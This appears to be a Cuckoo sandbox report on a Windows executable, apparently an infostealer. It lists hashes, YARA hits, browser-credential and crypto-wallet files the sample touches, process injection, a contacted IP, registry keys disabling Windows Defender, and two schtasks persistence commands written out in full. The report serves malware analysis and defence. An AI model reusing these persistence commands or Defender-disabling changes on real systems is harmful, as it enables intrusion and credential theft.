{u'size': 1207296, u'yara': [{u'strings': [], u'meta': {u'description': u'(no description)'}, u'name': u'IsPE32', u'offsets': {}}, {u'strings': [u'bnRkbGwuZGw='], u'meta': {u'date': u'2021-03-16', u'update': u'2021-04-14', u'description': u'Malicious Packer', u'author': u'r0d'}, u'name': u'Malicious_Packer_Zero', u'offsets': {u'o104': [[562778L, 0]]}}, {u'strings': [u'TVo='], u'meta': {u'ini_date': u'2020-06-03', u'description': u'PE File Signature', u'author': u'r0d'}, u'name': u'PE_Header_Zero', u'offsets': {u'signature': [[0L, 0]]}}, {u'strings': [u'Dz8HCw=='], u'meta': {u'description': u'Possibly employs anti-virtualization techniques', u'author': u'nex'}, u'name': u'anti_vm_detect', u'offsets': {u'virtualpc': [[897037L, 0]]}}], u'sha1': u'8715a140542b52ed2fa2a38a76e1d2032643a943', u'name': u'a41ff6402d00da75_8G51dyVKnnvS40g1JD2e.exe', u'filepath': u'C:\\Users\\test22\\AppData\\Local\\Temp\\jobA4F6U_tCj88G2a2\\8G51dyVKnnvS40g1JD2e.exe', u'sha512': u'558700b057955c5674b25303df2af6b8df19761b601e96c07d3b41e5586786dbfb65e2977d70d2ccecebd80c12a4fb2d932cda49daa9b87613832795ca29f300', u'urls': [], u'crc32': u'BA8ED5CF', u'path': u'/home/cuckoo/.cuckoo/storage/analyses/47572/files/a41ff6402d00da75_8G51dyVKnnvS40g1JD2e.exe', u'ssdeep': u'24576:+Z4uCjOyp+O4vBOpspnYW4wQHBaWnBCqgqZcWycSmC:sgjOWFpjzlHBaWntgqZcX', u'sha256': u'a41ff6402d00da752f2fefd4286c76771d51a14e4d8eb2ceca494863cf0b3334', u'type': u'PE32 executable (GUI) Intel 80386, for MS Windows', u'pids': [1792, 2416], u'md5': u'697b929b3a29125832a5814f22e15337', u'virustotal': {u'summary': {u'error': u'resource has not been scanned yet'}}}

Drops 159 unknown file mime types indicative of ransomware writing encrypted files back to disk (50 out of 159 events)

file	C:\Windows\Prefetch\PYTHON.EXE-C663CFDC.pf
file	C:\Windows\Prefetch\GOOGLEUPDATESETUP.EXE-305B5E54.pf
file	C:\Windows\Prefetch\AUDIODG.EXE-BDFD3029.pf
file	C:\Windows\Prefetch\THUNDERBIRD.EXE-A0DA674F.pf
file	C:\Windows\Prefetch\DLLHOST.EXE-4F28A26F.pf
file	c:\Windows\Temp\fwtsqmfile01.sqm
file	C:\Windows\Prefetch\SVCHOST.EXE-7AC6742A.pf
file	C:\Windows\Prefetch\GOOGLEUPDATE.EXE-D0E66F4A.pf
file	C:\Windows\Prefetch\86.0.4240.111_CHROME_INSTALLE-AF26656A.pf
file	C:\Windows\Prefetch\CSC.EXE-BE9AC2DF.pf
file	c:\Windows\Temp\fwtsqmfile00.sqm
file	C:\Users\test22\AppData\Local\Temp\F59E91F8
file	C:\Windows\Prefetch\SOFTWARE_REPORTER_TOOL.EXE-EB18F4FF.pf
file	C:\Users\test22\AppData\Local\Temp\~DF8C0F100C7231519A.TMP
file	C:\Windows\Prefetch\IEXPLORE.EXE-908C99F8.pf
file	C:\Windows\Prefetch\DLLHOST.EXE-5E46FA0D.pf
file	C:\Windows\Prefetch\SLUI.EXE-724E99D9.pf
file	C:\Windows\Prefetch\RUNDLL32.EXE-1304AE86.pf
file	C:\Windows\Prefetch\PING.EXE-7E94E73E.pf
file	C:\Windows\Prefetch\GOOGLEUPDATE.EXE-C3A1B497.pf
file	C:\Windows\Prefetch\TRUSTEDINSTALLER.EXE-3CC531E5.pf
file	C:\Windows\Prefetch\WMIPRVSE.EXE-1628051C.pf
file	C:\Windows\Prefetch\DEFRAG.EXE-588F90AD.pf
file	C:\Windows\Prefetch\CHROME.EXE-D999B1BA.pf
file	C:\Windows\Prefetch\SVCHOST.EXE-80F4A784.pf
file	C:\Windows\Prefetch\IMKRMIG.EXE-AAA206C5.pf
file	C:\Windows\Prefetch\UNPACK200.EXE-E4DF1A4E.pf
file	C:\Users\test22\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
file	C:\Windows\Prefetch\DLLHOST.EXE-40DD444D.pf
file	C:\Windows\Prefetch\IEXPLORE.EXE-4B6C9213.pf
file	C:\Windows\Prefetch\7ZFM.EXE-22E64FB8.pf
file	C:\Windows\Prefetch\GOOGLEUPDATESETUP.EXE-B0D5C571.pf
file	C:\Windows\Prefetch\GOOGLEUPDATESETUP.EXE-34B7EAE8.pf
file	C:\Windows\Prefetch\SVCHOST.EXE-E1E0ACE0.pf
file	C:\Windows\Prefetch\LOGONUI.EXE-09140401.pf
file	C:\Windows\Prefetch\TASKHOST.EXE-7238F31D.pf
file	C:\Windows\Prefetch\MOBSYNC.EXE-C5E2284F.pf
file	C:\Windows\Prefetch\AgGlFgAppHistory.db
file	C:\Windows\Prefetch\JAVAW.EXE-D0AA8787.pf
file	C:\Windows\Prefetch\SSVAGENT.EXE-0CD059B7.pf
file	C:\Windows\Prefetch\AgGlUAD_P_S-1-5-21-3832866432-4053218753-3017428901-1001.db
file	C:\Windows\Prefetch\CONHOST.EXE-1F3E9D7E.pf
file	C:\Windows\Prefetch\OSE.EXE-2B23CA4C.pf
file	C:\Windows\Prefetch\INSTALLER.EXE-60163557.pf
file	C:\Windows\Prefetch\PINGSENDER.EXE-8E79128B.pf
file	C:\Windows\Prefetch\RUNDLL32.EXE-5A853E81.pf
file	C:\Windows\Prefetch\AgRobust.db
file	C:\Windows\Prefetch\ICACLS.EXE-B19DE1F7.pf
file	C:\Windows\Prefetch\IMEKLMG.EXE-3FEB7CC0.pf
file	C:\Windows\Prefetch\CMD.EXE-4A81B364.pf

Appends a known CryptoMix ransomware file extension to files that have been encrypted (2 events)

file	C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
file	C:\Users\test22\AppData\Roaming\MultiDoge\multidoge.wallet

Deletes a large number of files from the system indicative of ransomware, wiper malware or system destruction (50 out of 488 events)

file	C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\D87fZN3R3jFeplaces.sqlite
file	C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\JX0OQi4nZtiqplaces.sqlite
file	C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\IWPfiAXUTJTSformhistory.sqlite
file	C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\02zdBXl47cvzHistory
file	C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\D87fZN3R3jFeWeb Data
file	C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\02zdBXl47cvzcookies.sqlite
file	C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\IWPfiAXUTJTSHistory
file	C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\5lop_S5WM5ERCookies
file	C:\Users\test22\AppData\Local\Temp\3WCfXFplHcxIJHg4Pd6b5AQxGpX8awic.zip
file	C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\QdX9ITDLyCRBplaces.sqlite
file	C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\3b6N2Xdh3CYwWeb Data
file	C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\3b6N2Xdh3CYwplaces.sqlite
file	C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\Ei8DrAmaYu9KLogin Data
file	C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\KvHrxJ77cmUgcookies.sqlite
file	C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\QdX9ITDLyCRBWeb Data
file	C:\Users\test22\AppData\Local\Temp\SetupExe(20200504224110B04).log
file	C:\Windows\Prefetch\SNIPPINGTOOL.EXE-EFFDAFDE.pf
file	C:\Windows\Prefetch\IMEKLMG.EXE-3FEB7CC0.pf
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1F4WQUHZ\dropbox_logo_text_2015-vfld7_dJ8[1].svg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\latestrocki[1].exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\override[1].css
file	C:\Windows\Prefetch\SVCHOST.EXE-7AC6742A.pf
file	C:\Windows\Prefetch\SVCHOST.EXE-80F4A784.pf
file	C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548_000_vcRuntimeMinimum_x64.log
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\desktop.ini
file	C:\Users\test22\AppData\Local\Temp\{E7573238-1B24-467B-B5A4-0BE967E0BF64}.tmp
file	C:\Users\test22\AppData\Local\Temp\jobA3F6U_tCj88G2a2\information.txt
file	C:\Windows\Prefetch\CONTROL.EXE-817F8F1D.pf
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\U06NAGU2\mnrstrtr[1].js
file	C:\Windows\Prefetch\MSCORSVW.EXE-90526FAC.pf
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000026.log
file	C:\Windows\Prefetch\RUNDLL32.EXE-5A853E81.pf
file	C:\Windows\Prefetch\CVTRES.EXE-2B9D810D.pf
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\SOC-Facebook[1].png
file	C:\Windows\Prefetch\RUNDLL32.EXE-8C11D845.pf
file	C:\Users\test22\AppData\Local\Temp\Setup00000994\SETUP.CHM
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\keys_js5[2].htm
file	C:\Windows\Prefetch\WERMGR.EXE-0F2AC88C.pf
file	C:\Windows\Prefetch\SVCHOST.EXE-E1E0ACE0.pf
file	C:\Windows\Prefetch\RUNDLL32.EXE-4366A668.pf
file	C:\Windows\Prefetch\RUNDLL32.EXE-87432CEE.pf
file	C:\Users\test22\AppData\Local\Temp\1000493001\latestrocki.exe
file	C:\Windows\Prefetch\AgGlUAD_P_S-1-5-21-3832866432-4053218753-3017428901-1001.db
file	C:\Windows\Prefetch\AgAppLaunch.db
file	C:\Users\test22\AppData\Local\Temp\SetupExe(20180405152131B24).log
file	c:\Windows\Temp\TS_7FC6.tmp
file	C:\Windows\Prefetch\IEXPLORE.EXE-908C99F8.pf
file	C:\Windows\Prefetch\GOOGLEUPDATE.EXE-C3A1B497.pf
file	C:\Windows\Prefetch\RUNDLL32.EXE-1304AE86.pf
file	C:\Windows\Prefetch\AUDIODG.EXE-BDFD3029.pf

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2776 resumed a thread in remote process 2856
NtResumeThread Jan. 23, 2024, 7:55 a.m.	thread_handle: 0x00000338 suspend_count: 1 process_identifier: 2856	1	0	0

Uses Sysinternals tools in order to add additional command line functionality (2 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

Detects VirtualBox through the presence of a file (1 event)

file	C:\Windows\Prefetch\VBOXDRVINST.EXE-7DCD6070.pf

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

185.172.128.53:80

Disables Windows Security features (6 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection

face.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All